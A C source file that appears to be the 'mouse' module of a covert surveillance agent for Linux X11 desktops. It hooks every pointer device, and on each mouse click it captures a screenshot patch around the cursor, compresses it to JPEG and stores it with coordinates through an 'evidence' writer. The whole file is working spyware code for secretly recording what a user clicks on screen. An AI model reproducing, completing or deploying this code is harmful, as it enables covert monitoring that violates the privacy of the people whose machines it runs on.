#include <stdio.h>
#include <stdlib.h>
#include <X11/Xlib.h>
#include <X11/Xutil.h>
#include <X11/extensions/XInput.h>
#include <jpeglib.h>
#include <openssl/bio.h>
#include <string.h>

#include "module.h"
#include "evidencemanager.h"
#include "me.h"

extern Display *display;

struct additional {
   unsigned int version;
   unsigned int processlen;
   unsigned int windowlen;
   unsigned int x;
   unsigned int y;
   unsigned int width;
   unsigned int height;
   char window[16];
} __attribute__((packed));

void *module_mouse_start(void *args)
{
   Display *display = NULL;
   int i = 0, devnum = 0, buttonpress;
   XDeviceInfo *devinfo = NULL;
   XDevice **device = NULL;
   XEventClass evlist;
   XEvent event;
   Window root, child;
   int rootX, rootY, childX, childY;
   unsigned int mask;
   int width = 40, height = 40;

   int screen;
   Window window;
   XWindowAttributes wininfo;
   XImage *image = NULL;

   unsigned long pixel;
   int x, y;
   char *buffer;
   struct jpeg_compress_struct cinfo;
   struct jpeg_error_mgr jerr;
   JSAMPROW row;
   unsigned char *outbuf = NULL;
   unsigned long int outlen = 0;

   BIO *bio_additional = NULL, *bio_data = NULL;
   int additionallen, datalen;
   char *additionalptr, *dataptr;
   struct additional a;
   
   debugme("Running module MOUSE\n");

   if(MODULE_MOUSE.param) {
      width = ((module_mouse_t *)MODULE_MOUSE.param)->width;
      height = ((module_mouse_t *)MODULE_MOUSE.param)->height;
   }

   while(MODULE_MOUSE.status != MODULE_STOPPING) {
      if(MODULE_MOUSE.status == MODULE_STARTING) MODULE_MOUSE.status = MODULE_STARTED;

      do {
         if((display = XOpenDisplay(NULL)) == NULL) break;
         if(!(devinfo = XListInputDevices(display, &devnum)) || !devnum) break;

         if(!(device = malloc(devnum * sizeof(XDevice *)))) break;

         for(i = 0; i < devnum; i++) {
            if(devinfo[i].use == IsXExtensionPointer) {
               if(!(device[i] = XOpenDevice(display, devinfo[i].id))) continue;
               DeviceButtonPress(device[i], buttonpress, evlist);
               XSelectExtensionEvent(display, DefaultRootWindow(display), &evlist, 1);
            } else {
               device[i] = NULL;
            }
         }

         while(MODULE_MOUSE.status != MODULE_STOPPING) {
            if(XNextEvent(display, &event)) continue;
            if(MODULE_MOUSE.status == MODULE_STOPPING) break;
            if(event.type != buttonpress) continue;
            XQueryPointer(display, DefaultRootWindow(display), &root, &child, &rootX, &rootY, &childX, &childY, &mask);
            debugme("x=%d, y=%d\n", rootX, rootY);

            screen = DefaultScreen(display);
            window = RootWindow(display, screen);
            if(!XGetWindowAttributes(display, window, &wininfo)) break;
            if(!(image = XGetImage(display, window, ((rootX > (width / 2)) ? rootX - (width / 2) : 0), ((rootY > (height / 2)) ? rootY - (height / 2) : 0), ((rootX + (width / 2) < wininfo.width) ? width : wininfo.width - rootX), ((rootY + (height / 2) < wininfo.height) ? height : wininfo.height - rootY), AllPlanes, ZPixmap))) break;
            if(image->depth != 24) break; 

            buffer = malloc(3 * image->width * image->height);
            for(y = 0; y < image->height; y++) {
               for(x = 0; x < image->width; x++) {
                  pixel = XGetPixel(image, x, y);
                  buffer[y * image->width * 3 + x * 3 + 0] = (char)(pixel>>16);
                  buffer[y * image->width * 3 + x * 3 + 1] = (char)((pixel>>8) & 0xff);
                  buffer[y * image->width * 3 + x * 3 + 2] = (char)(pixel & 0xff);
               }
            }

            cinfo.err = jpeg_std_error(&jerr);
            jpeg_create_compress(&cinfo);
            jpeg_mem_dest(&cinfo, &outbuf, &outlen);

            cinfo.image_width = image->width;
            cinfo.image_height = image->height;
            cinfo.input_components = 3;
            cinfo.in_color_space = JCS_RGB;

            jpeg_set_defaults(&cinfo);
            jpeg_set_quality(&cinfo, 75, TRUE);
            jpeg_start_compress(&cinfo, TRUE);

            while(cinfo.next_scanline < cinfo.image_height) {
               row = (JSAMPROW)&buffer[cinfo.next_scanline * 3 * image->width];
               jpeg_write_scanlines(&cinfo, &row, 1);
            }
            jpeg_finish_compress(&cinfo);
            jpeg_destroy_compress(&cinfo);

            bio_additional = BIO_new(BIO_s_mem());
            bio_data = BIO_new(BIO_s_mem());

            a.version = 2009040201;
            a.windowlen = 16;
            a.processlen = 0;
            a.x = rootX;
            a.y = rootY;
            a.width = (rootX + (width / 2) < wininfo.width) ? width : wininfo.width - rootX;
            a.height = (rootY + (height / 2) < wininfo.height) ? height : wininfo.height - rootY;
            memcpy(a.window, "D\0e\0s\0k\0t\0o\0p\0\0\0", sizeof(a.window));

            BIO_write(bio_additional, &a, sizeof(a));

            BIO_write(bio_data, outbuf, outlen);

            BIO_flush(bio_additional);
            BIO_flush(bio_data);

            additionallen = BIO_get_mem_data(bio_additional, &additionalptr);
            datalen = BIO_get_mem_data(bio_data, &dataptr);

            evidence_write(EVIDENCE_TYPE_MOUSE, additionalptr, additionallen, dataptr, datalen);
         }
      } while(0); 

      if(outbuf) free(outbuf);
      if(buffer) free(buffer);
      if(image) XDestroyImage(image);
   }

   MODULE_MOUSE.status = MODULE_STOPPED;

   return NULL;
}
